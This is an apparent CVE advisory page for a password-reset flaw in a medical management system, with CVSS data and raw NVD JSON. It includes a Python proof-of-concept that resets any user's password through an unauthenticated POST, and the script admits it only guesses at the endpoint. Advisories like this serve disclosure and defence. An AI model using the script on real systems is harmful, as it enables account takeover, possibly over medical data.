Security Vulnerability Report
中文
CVE-2025-67437 CVSS 6.5 MEDIUM

CVE-2025-67437

Published: 2026-05-15 15:16:50
Last Modified: 2026-05-15 19:16:57

Description

Medical Management System a81df1ce700a9662cb136b27af47f4cbde64156b is vulnerable to Insecure Permissions, which allows arbitrary user password reset.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Medical Management System (commit a81df1ce700a9662cb136b27af47f4cbde64156b)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_password_reset(target_url, user_id, new_pass): """ Exploit CVE-2025-67437: Arbitrary User Password Reset """ # The vulnerable endpoint might be /reset_password or similar endpoint = f"{target_url}/api/reset_password" # Payload containing the target user ID and the new password payload = { "uid": user_id, "password": new_pass } try: # Sending the request without authentication headers response = requests.post(endpoint, data=payload, timeout=10) if response.status_code == 200 and "success" in response.text.lower(): print(f"[+] Successfully reset password for user ID: {user_id}") print(f"[+] New password set to: {new_pass}") else: print(f"[-] Exploit failed. Status: {response.status_code}") print(response.text) except Exception as e: print(f"[-] Error: {e}") # Usage example # exploit_password_reset("http://target-ip", "1", "admin123")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67437", "sourceIdentifier": "[email protected]", "published": "2026-05-15T15:16:49.883", "lastModified": "2026-05-15T19:16:57.030", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Medical Management System a81df1ce700a9662cb136b27af47f4cbde64156b is vulnerable to Insecure Permissions, which allows arbitrary user password reset."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://gitee.com/ljt12343/report/issues/IDB6P8", "source": "[email protected]"}, {"url": "https://github.com/wxhlcy/cve/issues/2", "source": "[email protected]"}]}}